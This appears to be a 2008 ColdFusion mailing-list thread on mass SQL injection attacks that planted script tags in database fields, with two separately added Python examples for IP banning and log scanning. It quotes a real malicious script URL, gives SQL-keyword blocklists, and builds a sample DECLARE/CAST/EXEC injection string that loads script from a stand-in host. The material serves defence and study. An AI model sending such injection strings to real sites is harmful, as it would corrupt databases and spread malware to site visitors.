that, say, compromise peoples' credit card data, they typically come from
forms.
> With this script I would not recommend checking the form
> scope as there is too high a risk of false positives. I've
> never heard of an injection attack coming through CGI
> variables. I suppose it's possible, but the percentage of
> queries using CGI scope data is probably minuscule compared
> to URL variables.
Again, targeted attacks will attempt to use any data that comes from the
client. A brief review of the available tools for pen testing will show you
that.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310440
> I just put this on a site for testing purposes - and less than one hour
> later - over 2 dozen emails to me of attack attempts!!!!
6 more from a different IP address while I was typing my original message!!
Unreal!
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310436
> http://www.gravityfree.com/_sqlprev.cfm.txt
<div id="best Keanu Reeves imitation">
Dude!!! Whoa!!!
</div>
I just put this on a site for testing purposes - and less than one hour
later - over 2 dozen emails to me of attack attempts!!!!
I've got cfqueryparam on all queries on this site already, but to see
that many attacks almost immediately after installing the script was a
little mind numbing!
Folks, if you don't think this is serious, think
again!
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310426
> Good effort... It does not check the form scope however - or CGI
Since nearly all SQL injection attempts come through the URL (including
the recent ones), that is where I put the focus. With this script I
would not recommend checking the form scope as there is too high a risk
of false positives. I've never heard of an injection attack coming
through CGI variables. I suppose it's possible, but the percentage of
queries using CGI scope data is probably minuscule compared to URL
variables.
> As has been pointed out, a blacklist function like this one will
> result a good number of false positives for items that are legitimate.
I would replace "will" with "may" in that statement, and then agree.
We've been using this internally for years without any false positives
(yet).
> Also note that not every DB platform requires a semi-colon for
> end of statement. Some of them allow for line breaks for
> example (at least in the default installation).
Ours was designed for SQL Server; perhaps I should have pointed that out
earlier. I'll reiterate again that it's not meant as a guaranteed SQL
injection stopper, just a quick way to provide a first line of defense
while you patch up your queries properly.
-Justin Scott
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310423
Justin,
Good effort... It does not check the form scope however - or CGI (a rarely
used but still vulnerable scope). As has been pointed out, a blacklist
function like this one will result in a good number of false positives for
items that are legitimate. Also note that not every DB platform requires a
semi-colon for end of statement. Some of them allow for line breaks for
example (at least in the default installation).
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310420
> I must have 100,000 pages I need to protect --
Better get started then. :)
Read about two tools that can make the job easier for you:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
Whatever stop-gaps or filtering mechanisms you put in place, your final
solution needs to include parameterizing inputs to all your queries.
~Brad
Author: Rebecca Wells
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310421
I'd be interested in seeing this also.
>We have CF5
>and CFMX versions if anyone wants a copy.
>
>
>-Justin Scott
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310417
> What I'm wondering is the pros and cons of doing it this way. Does it
> slow down the app checking for this on every page hit? Or do it the old
> fashioned way and clean up all the queries. Thoughts?
That depends on what your definition of slow is. On a modern server a
simple check for a specific string anywhere in the URL as you described
isn't going to even show up in speed testing. The code I posted is more
robust and takes a couple ms to run, but unless your server is getting
absolutely hammered the difference in execution time shouldn't be at all
noticeable.
I will emphasize that the front-end URL scanning is meant as a first
line of defense. It will help, but protection on individual queries and
input validation should still be considered best practice going forward,
and implemented on older code if time and budget permit.
-Justin Scott
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310416
> I must have 100,000 pages I need to protect -- and my primary
> database has something like 180 tables, some of which have more than
> 100 fields. So, I need something I can do quickly. And I got a lot
> to learn about this.
See my previous post regarding this code which can be placed in front of
an application as a stop-gap measure to give you time to patch
everything properly:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Tim Do
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310415
Thanks for the code, I'm in the process of cleaning all the query
calls for my client and have been seeing lots of posts regarding this SQL
injection. There are a couple thousand queries that I have to clean up
but while I'm in the process of cleaning they're getting injected over
and over and over!! So I did something similar to this, not as in
depth, but I added some logic to application.cfm to check
cgi.query_string for parts of the injection script.
What I'm wondering is the pros and cons of doing it this way. Does it
slow down the app checking for this on every page hit? Or do it the old
fashioned way and clean up all the queries. Thoughts?
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310413
Thanks, Andy and Ian --
I am going through this previous thread (I did get hit with this 2 or
3 weeks ago also) -- so, I am just wondering how I can get a
basic/minimal level of protection installed, maybe linked from application.cfm
I must have 100,000 pages I need to protect -- and my primary
database has something like 180 tables, some of which have more than
100 fields. So, I need something I can do quickly. And I got a lot
to learn about this.
So, just probing this one question -- what people are saying is -- it
comes through a URL -- and not a user forms-submission (or at least
that seems to be the case) ??
Here's a question:
If it is possible to do a basic general-purpose kind of input
filtering from application.cfm -- not as good as going through every
query, but something that can be done quickly -- would it be possible
to write a kind of generic protection script?
The specifics of this script would depend on the
variables/fieldnames/datatypes -- but if we had a general-purpose script,
1) stop attack type-A
2) stop attack type-B
3) stop attack type-C
programmer to fill in the blanks -- ie, itemize the field names and types....
Could that be done? If that were possible, that would be a great
help. Thanks for this good discussion.
- Bruce
----- Excess quoted text cut - see Original Post for more -----
At 09:25 AM 8/7/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310410
> And yes, I'd like to see the URL "loop" script that was offered by Justin
Scott
I've had many requests for the SQL injection prevention script, so I'm
just going to post a URL directly to the code and release it into the
public domain for anyone interested:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310409
> Can this be done through a URL?
Yes, easily.
----- Excess quoted text cut - see Original Post for more -----
Your database contains all its object names in metadata tables, which can be
queried directly.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310408
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
----- Excess quoted text cut - see Original Post for more -----
Author: Jacob
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310404
Any recommendations for web app firewall?
I have worked with Netscreen network firewall for years.
----- Excess quoted text cut - see Original Post for more -----
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310393
Bruce Schuman wrote:
> How do they do this?
Yes it is done through the URL. This is well discussed here and in many
blogs. But the gist is that the errant URL parameter is an ENTIRE
SQL function that will tell your database to scan every table looking at
every field, and if the field is a character field, to append the
payload to that field.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310391
Bruce...
Without going into the whole thing, the script runs in your database and
selects against the systables and syscolumns tables. It then loops over
these and performs updates on existing records.
You really need to go back and read the entire thread from 3 weeks ago.
http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065
It has everything you'd need to know about what this attack does, how to
reverse the results, and lastly how to prevent it from happening again.
andy
Author: Matt Blatchley
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310390
We've got the same thing. Sonicwall checks everything coming in and out of
the network and checks for anything that matches a database of known
injection types. Helps a ton!
Matt
----- Excess quoted text cut - see Original Post for more -----
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310387
> The attack appends JavaScript to character fields.
Hi. Just checking in here on SQL injection -- I am a self-taught
self-employed CF programmer, been doing this for quite a while, but
there is a ton I don't know. And I have been hit by this current
wave of injection
So, my SQL Server 2005 database doesn't just get one record
injected. It's every record in a particular field, all containing
(in this attack) this code
script src="http://jjmaoduo.3322.org/csrss/w.js"
and a few more things in html I didn't include
What I have done to protect about 15 CF sites -- is simply require
that integer values be integers -- by cfincluding a list of params
like this, from application.cfm:
----- Excess quoted text cut - see Original Post for more -----
So, this text script has been injected into every record in about
five fields in my users table -- and also into a variety of other
tables in the same way: every record in that table, in some selected fields.
All these injected fields are text fields -- URLs, addresses,
Can this be done through a URL?
Does the list of fields that have been injected provide any clue
about how or where the injection attack occurred? How do these guys,
or their program, know my table names and my field names? I have
some very obscure field names, and they still get them injected -
they are not guessing these things, they know the name of the field.
If I wanted to duplicate what they did, I would write a loop that
would go through every record in the table, and CFUPDATE that
particular record. In fact, I wrote scripts like this to remove this
junk, setting the record back to what it was before the
injection. How do they do this?
Anyway, got my hands full. Any thoughts on this would be great.
And yes, I'd like to see the URL "loop" script that was offered by Justin Scott
----- Excess quoted text cut - see Original Post for more -----
Bruce Schuman
Santa Barbara CA
http://originresearch.com
Author: Mark Atkinson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310385
We drew a great deal of breathing room to implement the solutions
discussed here with our installation of Sonicwall firewall (about 600
bucks). Its intrusion prevention settings are highly configurable, both
globally and individually, and with an annual subscription of 200
dollars we get I believe daily upgrades to help configure against new
and known issues.
In our small shop it's been worth every single penny.
HTH
Mark
Kris Jones wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310384
>>I'm a little bemused as to why you'd create such a response guys.
Just to make sure I give a chance to a legitimate user, in case my
robot detection was a bit too strong.
For instance, I also have a test based on the number of HTTP requests per
second in order to discriminate robots from humans.
Sometimes, the limit is not easy to set precisely: there are fast
humans, and slow robots ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310383
Craig Dudley wrote:
> I suppose it would help **IF** a legitimate user came to your site at a
> later date from a banned IP, but that's all, or is that why you are doing
> it?
>
> Craig.
Exactly, if you are managing a popular enough site, it could happen. At
least once or twice in a blue moon.
The idea being that since the users may not be aware of their infection as
you mentioned, this just might be the way they find out.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310380
Craig Dudley wrote:
> I suppose it would help **IF** a legitimate user came to your site at a
> later date from a banned IP, but that's all, or is that why you are doing
> it?
>
> Craig.
Exactly, if you are managing a popular enough site, it could happen. At
least once or twice in a blue moon.
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310378
----- Excess quoted text cut - see Original Post for more -----
You'd need a web application firewall for this. Any ISAPI solution runs
in-process with the web server.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Author: Craig Dudley
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310377
I'm a little bemused as to why you'd create such a response guys.
A bot is attempting the injection attacks yes? It's not likely to be visible
to the host computer's owner as far as I can imagine.
I suppose it would help **IF** a legitimate user came to your site at a
later date from a banned IP, but that's all, or is that why you are doing
it?
Craig.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310374
>>"Your system appears to be infected with a bot and it is
currently banned from accessing this site..."
The cherry on the sundae ;-)
In this page, I even have a form so the user can give his address and
claim his innocence ;-)
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310368
Claude Schneegans wrote:
> - In your application.cfm, simply check if cgi.REMOTE_ADDR is in the
> list of banned addresses
> and CFABORT if yes.
Just throwing a random thought that occurred to me when I read this.
If one cares to be a little nicer and proactive, maybe throw up a very
simple and basic, "Your system appears to be infected with a bot and it is
currently banned from accessing this site..." or something to that effect.
The idea being maybe some of the poor souls may learn something.
But only if one cares to do so.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310364
>>I was hoping to find an elegant solution that stored the IPs in the
application scope for the length of the session timeout and then gracefully
removed the banned IPs once the session timed out.
How about doing this:
- Create a server scope array or list (if you have several sites), or
just in the application scope.
- Add to the array any banned IP.
- Delete the first element in the array (the oldest) if its length is
over a certain maximum, based on the idea that the bot is probably
operating from an innocent infected PC and will not be a threat for
months, so it is not useful to memorize banned addresses for ever.
- The length of the array you will keep depends on the amount of attacks
you are receiving each day; about 100 or so sounds reasonable.
- In your application.cfm, simply check if cgi.REMOTE_ADDR is in the
list of banned addresses and CFABORT if yes.
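Added example, not code from this thread: the rolling ban list described in this post and in the earlier post that keeps only the most recent 100 attacking IPs, sketched in Python as a stand-in for a CF application/server-scope array, with the time-based expiry Che Vilnonis asked about as an option. The TTL, the IP addresses and the replayed request sequence are assumptions/constructed.

```python
# Added example, not from the thread: a rolling ban list standing in for the
# application/server-scope array Claude describes. Capacity-bounded (oldest
# entry evicted first) with an optional TTL (assumed; the post has no timer).
import threading
import time
from collections import OrderedDict
from typing import Callable, Dict, Iterable, Optional, Tuple


class RecentBanList:
    """Keeps at most max_entries banned IPs, newest last, oldest evicted first."""

    def __init__(self, max_entries: int = 100, ttl_seconds: Optional[float] = None,
                 clock: Callable[[], float] = time.time) -> None:
        self._max = max_entries
        self._ttl = ttl_seconds
        self._clock = clock
        self._entries: "OrderedDict[str, float]" = OrderedDict()
        self._lock = threading.Lock()  # shared scope: guard concurrent requests

    def _purge_expired(self) -> None:
        """Drop entries older than the TTL (entries are kept in ban order)."""
        if self._ttl is None:
            return
        cutoff = self._clock() - self._ttl
        while self._entries:
            _oldest_ip, banned_at = next(iter(self._entries.items()))
            if banned_at >= cutoff:
                break
            self._entries.popitem(last=False)

    def ban(self, ip: str) -> None:
        """Append ip at the end; drop the oldest entries once over capacity."""
        with self._lock:
            self._entries.pop(ip, None)        # re-banning moves it to the end
            self._entries[ip] = self._clock()
            while len(self._entries) > self._max:
                self._entries.popitem(last=False)

    def is_banned(self, ip: str) -> bool:
        with self._lock:
            self._purge_expired()
            return ip in self._entries

    def __len__(self) -> int:
        with self._lock:
            self._purge_expired()
            return len(self._entries)


def gate_request(banlist: RecentBanList, remote_addr: str, is_attack: bool) -> str:
    """The application.cfm order of checks: a banned address is aborted before
    any page logic runs; an address whose very first request is an attack is
    banned immediately, so it never receives a page full of links to crawl."""
    if banlist.is_banned(remote_addr):
        return "blocked"
    if is_attack:
        banlist.ban(remote_addr)
        return "banned"
    return "served"


def replay(events: Iterable[Tuple[str, bool]],
           banlist: Optional[RecentBanList] = None) -> Dict[str, int]:
    """Run a sequence of (remote_addr, is_attack) requests and count outcomes."""
    if banlist is None:
        banlist = RecentBanList()
    counts = {"served": 0, "banned": 0, "blocked": 0}
    for remote_addr, is_attack in events:
        counts[gate_request(banlist, remote_addr, is_attack)] += 1
    return counts


if __name__ == "__main__":
    # Constructed sequence: one bot tries four times, one ordinary visitor once.
    sample = [("198.51.100.7", True), ("198.51.100.7", False),
              ("198.51.100.7", False), ("198.51.100.7", False),
              ("203.0.113.5", False)]
    print(replay(sample))  # {'served': 1, 'banned': 1, 'blocked': 3}
```

The replay shows the point made later in the thread: when the ban lands on the first attempt, the logs show one request per attacking address instead of a full crawl.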
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310362
Thanks. I was hoping to find an elegant solution that stored the IPs in the
application scope for the length of the session timeout and then gracefully
removed the banned IPs once the session timed out. I have an idea on what to
do, but was looking for a little guidance as I am new to app.cfc and all of
its methods. Regards, CV.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310361
>>I'd like to know how I can stop the requests from ever hitting the
web-server.
If you detect the attack at the first request, and block the IP, the bot
will not even get the first page, will not see all links in it, and will
not search your entire server.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310360
>>Claude, could you possibly share your code that stores the bad IP
addresses for a period of time to prevent these useless http requests?
Thanks, CV.
Well, I'd be happy to, but it is a rather complete and complicated system.
It works for all sites/domains on the CF server, uses a database, and is
mainly oriented toward bad and unwanted bots elimination. The spam and SQL
injection detection is only a small part of it.
I can give you this part of code which detects illegal URL parameters.
The idea is simply to
1. detect if a URL parameter is invalid and,
2. if yes, check if there is anything evil in it.
In the first case, the request is simply ignored, in the second case,
the IP is banned.
This code will check if the parameter id is a numeric value:
<CFIF val(id) EQ 0
      AND (id CONTAINS "http"
           OR id CONTAINS "user"
           OR id CONTAINS "declare"
           OR id CONTAINS "exec")>
    <!--- id is not a number and carries a suspicious word --->
    ... ban this IP address
    <CFABORT>
<CFELSE>
    <!--- otherwise keep only the numeric part of the value --->
    <CFSET id = val(id)>
</CFIF>
You may include this code in any page depending on some numeric parameter,
or better: make it a custom tag or CFC.
For text parameters, like page names, etc. I simply use:
<CFIF pTexte CONTAINS "http"
      OR pTexte CONTAINS "user"
      OR pTexte CONTAINS "declare"
      OR pTexte CONTAINS "exec">
    <!--- same handling as above --->
    ... ban this IP address
    <CFABORT>
</CFIF>
For text fields in forms filled by users, a more precise analysis would
be needed, but I have none of these on my sites. No one can enter anything
if he is not registered.
Author: Randy Johnson - CFConcepts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310358
> No, that's exactly what he described. The attack appends JavaScript to
> character fields. And, unfortunately, blocking specific IP addresses won't
> get you very far here, because it's a random, automated attack run from
> compromised hosts in a botnet, I think.
>
>
Yea I think it is too. I started tracking IPs on a page that I saw
always showing up in FusionReactor. This morning I am up to 378
IP addresses blocked within the last three days.
I started out by emailing myself the IP address thinking it would only
be a few IPs. I cannot believe how bad the issue is...
-Randy
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310357
>>Tuesday night received about 20 thousand instances (not an
exaggeration). Slowing down now for us, but, heh, it's early.
This is where banning IPs at the first attempt will reduce this pollution.
If the attack is detected at the first attempt, and the address banned,
the statistics will show only one request per IP address.
Otherwise, you will allow the bot to open all your pages, archives, etc.
and your server may choke.
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310356
I'd like to know how I can stop the requests from ever hitting the web-server.
Can anyone point me at a resource for a firewall solution? I've seen
some isapi filter solutions, but they all seem to just clean the
querystring and then forward the request on -- so it's still hitting
CF. I'd really like to stop it before we get to the web-server at all
(let alone the CF application server).
Cheers,
Kris
Author: Che Vilnonis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310355
Claude, could you possibly share your code that stores the bad IP addresses
for a period of time to prevent these useless http requests? Thanks, CV.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310354
>>blocking specific IP addresses won't
get you very far here, because it's a random.
Blocking IP addresses won't prevent injection in your database if it is
not protected, but if an attack is detected at the very first attempt, it
will save thousands of useless HTTP requests on your sites, because these
robots will scan everything they find.
Author: Kris Jones
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310353
We handled this attack last month (it never did get through), and
starting Tuesday night received about 20 thousand instances (not an
exaggeration). Slowing down now for us, but, heh, it's early.
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310352
> We have CF5 and CFMX versions if anyone wants a copy.
I really see having several layers of protection to effectively stop
this sort of thing. Something at the application level sounds like a
good first line of defense.
I'd be interested in seeing this.
Thanks
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310351
>>Various people have been warning in the last few weeks that this sort of
scatter gun approach that started with ASP-based sites is now migrating to
ColdFusion powered ones.
And it is growing up.
Yesterday, my bad bot closed the door to about 50 attacks, and this
morning I have 60 reported.
Usually I get around 5 only each night.
Author: Justin D. Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310350
> Anyway, whatever solves the Michael's problem I feel sure
> is going to be a combination of things, not just the one.
Actually, with this particular SQL injection attack it's really easy to
stop. We created a SQL filter that is called from application.cfm. It
loops through the URL structure and checks to see if any URL variables
contain both a semi-colon and any SQL keyword. If a match is found, it just
cfaborts the request and sends us an e-mail with the details. We
periodically review those messages and have not found a single
false-positive yet after deployment to every site we manage. Granted, it
will not stop SQL injection through form posts, but I don't recall ever
seeing a SQL injection attack through a form post (yet). At the least it
can put an immediate stop to the current flood and give you time to
implement other protective measures such as cfqueryparam, etc. We have CF5
and CFMX versions if anyone wants a copy.
-Justin Scott
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310349
Michael,
I have about 5 posts on this issue:
http://www.coldfusionmuse.com
Starting with this one...
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII
There's no magic bullet. The basic procedure is going to be to implement a
blacklist function to prevent the attack (this is a "first level" defense to
give you some breathing room), restore your DB or fix it with one of the
several scripts running around, then go through your code and examine all
the queries and add cfqueryparam, then look at where you are handling form
inputs and validate what users have given you, then work on scrubbing
anything that is given by the user that is output to the page (to prevent
xss). Basically, other than the blacklist function (about which there are a
variety of opinions) all of these steps ought to be followed regularly as
your de facto coding standard.
-Mark
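As an added example (not code from this thread, and not Justin Scott's or Mark Kruger's own filter), here is a log-side version of the URL-parameter check Justin describes above, paired with a decoder for the hex literal that the CAST-based injections in Mark's post carry. It runs the rule over constructed access-log lines: the client IPs, the example.invalid host, the INJECTED_SQL statement and the log entries are all made up for this example, and the hex payload is built from that plaintext so the block checks itself.

```python
# Added example, not from the thread: flag URL parameters that carry both a ';'
# and an SQL keyword (the rule Justin Scott describes), and decode the 0x... literal
# of a CAST(0x... AS VARCHAR) injection. All sample data below is constructed.
import re
from urllib.parse import unquote_plus

# Keywords a legitimate URL parameter should never carry together with ';'
SQL_KEYWORDS = ("declare", "cast", "exec", "select", "insert", "update",
                "delete", "drop", "union", "sysobjects", "syscolumns")
KEYWORD_RE = re.compile(r"\b(?:" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)
HEX_LITERAL_RE = re.compile(r"0x([0-9a-f]{8,})", re.IGNORECASE)
# Combined log format: client IP and the request target of a GET/POST
ACCESS_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')


def parse_query(query):
    """Split a raw query string on '&' only (never on ';') and percent-decode each side."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def is_suspicious(value):
    """True when the value holds a ';' and an SQL keyword, after one or two decoding passes."""
    for candidate in (value, unquote_plus(value)):  # second pass catches double-encoding
        if ";" in candidate and KEYWORD_RE.search(candidate):
            return True
    return False


def decode_hex_payload(value):
    """Return the text hidden in a 0x... literal (VARCHAR or NVARCHAR), or '' if there is none."""
    match = HEX_LITERAL_RE.search(value)
    if not match or len(match.group(1)) % 2:
        return ""
    raw = bytes.fromhex(match.group(1))
    if len(raw) >= 2 and not any(raw[1::2]):  # NVARCHAR payloads are UTF-16LE
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def scan_access_log(lines):
    """One record per flagged parameter: who sent it, which parameter, and what it carried."""
    findings = []
    for line in lines:
        match = ACCESS_LINE_RE.match(line)
        if not match:
            continue
        ip, target = match.groups()
        _, _, query = target.partition("?")
        for name, value in parse_query(query):
            if is_suspicious(value):
                findings.append({"ip": ip, "param": name, "value": value,
                                 "decoded_payload": decode_hex_payload(value)})
    return findings


# --- constructed sample data (not real traffic) --------------------------------
# The statement the attacker hides in the hex literal; real payloads walked sysobjects
# to append the script tag to every character column, this one is kept short.
INJECTED_SQL = "UPDATE t SET c=c+'<script src=\"http://example.invalid/w.js\"></script>'"
HEX_PAYLOAD = INJECTED_SQL.encode("latin-1").hex()
ATTACK_QUERY = ("id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x" + HEX_PAYLOAD
                + "%20AS%20VARCHAR(4000));EXEC(@S);--")
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Aug/2008:03:58:12 +1000] "GET /products.cfm?id=12&sort=name HTTP/1.1" 200 4820',
    '10.0.0.9 - - [07/Aug/2008:04:04:31 +1000] "GET /products.cfm?' + ATTACK_QUERY + ' HTTP/1.1" 200 4820',
    # Free text with a ';' and two keywords: the rule flags this too (a false positive)
    '10.0.0.7 - - [07/Aug/2008:04:05:02 +1000] "GET /search.cfm?q=select+a+date;+then+update+me HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ip"], finding["param"], repr(finding["decoded_payload"]))
```

The query string is split by hand rather than with parse_qsl because older Python versions split on ';' as well as '&', which would hide exactly the character the rule keys on. The third sample line shows the price of the heuristic: a free-text search parameter can trip it, which is why the e-mail review Justin mentions matters, and why this is a stop-gap until every query uses cfqueryparam.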
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310347
> The solution is to filter all input from users with something like
> cfqueryparam. The only reason to combine that with another solution is to
> filter data that made it in already... and like Tom said,
Ahh, no, not the only reason.
Suppose I enter JavaScript as my 'name' in a blog comment form. cfqp will let
that pass (it's text, in a text field, with a text cf_sql_type) but you still
want to htmlEditFormat() on output.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310344
If you have the option, that'd be much more efficient at the network level
than in the app and would filter the IPs for all apps at once. It might get
more 'effective' the larger it gets but it also gets less efficient.
The solution is to filter all input from users with something like
cfqueryparam. The only reason to combine that with another solution is to
filter data that made it in already... and like Tom said, simply formatting
the data with htmledit on display will render the script/html as useless
plain text.
Not to get on a rant either but... 5-6 successful spam submissions per month
is 5-6 too many in my opinion. There are too many simple solutions to 99.9%
of them. It used to be that 1 would send a developer on a frenzied mission
to stop it; now they are so abundant that people are becoming ok with 5 or 6
a month?
Come on... if you don't filter your user content, the terrorists win. ;-)
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310343
> Use CFQUERYPARAM around all user-submitted query values.
And htmlEditFormat() around places where database data is output to the end
user.
--
Tom Chiverton
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310342
Well, as I said, the answer to this (as it is for a lot of things on
the web) is not one but a combination of tactics.
The ban-IP thing might not be the bee's knees for this but it sure
helps with the kind of thing I THOUGHT he was describing. I've been
able to almost eliminate spam entries from my guestbook/contact us
forms (OK, I haven't almost eliminated them, let's say dramatically reduced
them) across my sites. On one client's site for example, their
guestbook was choking to death with thousands of entries all spam, and
now it's fewer than 5-6 spam entries a month. I have a database of
9600 or so IP addresses that I won't accept input from on any of my
sites. As time goes on it gets more and more effective.
Anyway, whatever solves Michael's problem I feel sure is going to
be a combination of things, not just the one.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion 8 Ent, PHP 4 and 5, ASP, ASP.NET hosting from AUD$15/month
On Thu, Aug 7, 2008 at 9:20 PM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310341
----- Excess quoted text cut - see Original Post for more -----
Use CFQUERYPARAM around all user-submitted query values.
http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html
This specific issue came up on the list repeatedly over the last few weeks,
so you might want to check the list archives.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310340
> I konw you havent described a SQL injection ...
No, that's exactly what he described. The attack appends JavaScript to
character fields. And, unfortunately, blocking specific IP addresses won't
get you very far here, because it's a random, automated attack run from
compromised hosts in a botnet, I think.
Dave Watts, CTO, Fig Leaf Software
